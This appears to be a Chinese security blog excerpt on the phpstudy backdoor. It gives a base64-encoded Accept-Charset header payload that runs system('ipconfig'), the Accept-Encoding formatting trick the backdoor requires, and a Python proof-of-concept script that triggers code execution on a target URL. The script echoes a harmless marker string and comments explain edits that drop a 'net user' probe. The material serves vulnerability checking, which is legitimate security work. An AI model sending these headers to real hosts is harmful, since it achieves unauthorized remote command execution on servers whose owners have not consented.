Accept-Encoding要把gzip, deflate 里逗号后面的空格去掉,不然命令执行不成功
Accept-Charset 的值就是执行的命令, 需要进行base64编码
构造Payload:
// 执行命令 system('ipconfig');
accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=
# -*-coding:utf-8 -*-
import requests
import sys
import base64
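def Poc(ip):
    """Check whether the phpstudy backdoor answers on ``ip`` (a base URL).

    The backdoor described at the top of this page executes the base64-decoded
    value of the ``Accept-Charset`` header. This probe sends only a harmless
    ``echo`` of a fixed marker string and reports the backdoor as present when
    that exact marker comes back in the response body, so a normal page cannot
    trigger a false positive. ``Accept-Encoding`` must stay ``gzip,deflate``
    with no space after the comma (see the note above the code).

    Args:
        ip: Target base URL, e.g. ``http://127.0.0.1``; passed to
            ``requests.get`` unchanged.

    Returns:
        ``None``; prints one of the two result lines instead.

    Raises:
        requests.RequestException: the host could not be reached or the
            request timed out.
    """
    marker = "hello phpstudy"
    # The original script built this echo payload but then sent a hard-coded
    # ``echo system("net user");`` probe instead. The echo marker is enough to
    # prove code execution and avoids running a further command on the host.
    payload = 'echo "' + marker + '";'
    # b64encode returns bytes; header values must be str.
    poc = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Connection": "close",
        # No space after the comma: the backdoor does not fire otherwise.
        "Accept-Encoding": "gzip,deflate",
        "Accept-Charset": poc,
        "Upgrade-Insecure-Requests": "1",
    }
    # A timeout keeps an unresponsive host from hanging the whole check.
    r = requests.get(ip, headers=headers, timeout=10)
    # The original test ``"Administrator" or "DefaultAccount" in r.text`` was
    # always true because a non-empty string literal is truthy; check the
    # marker explicitly instead.
    if marker in r.text:
        print("存在phpstudy后门")
    else:
        print("不存在phpstudy后门")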
# Command-line entry: a single argument, the target base URL, is required.
args = sys.argv
if len(args) >= 2:
    Poc(args[1])
else:
    # Usage hint when the URL argument is missing.
    print("python phpstudy.py http://127.0.0.1")
原文:https://www.cnblogs.com/Frieza/p/14596488.html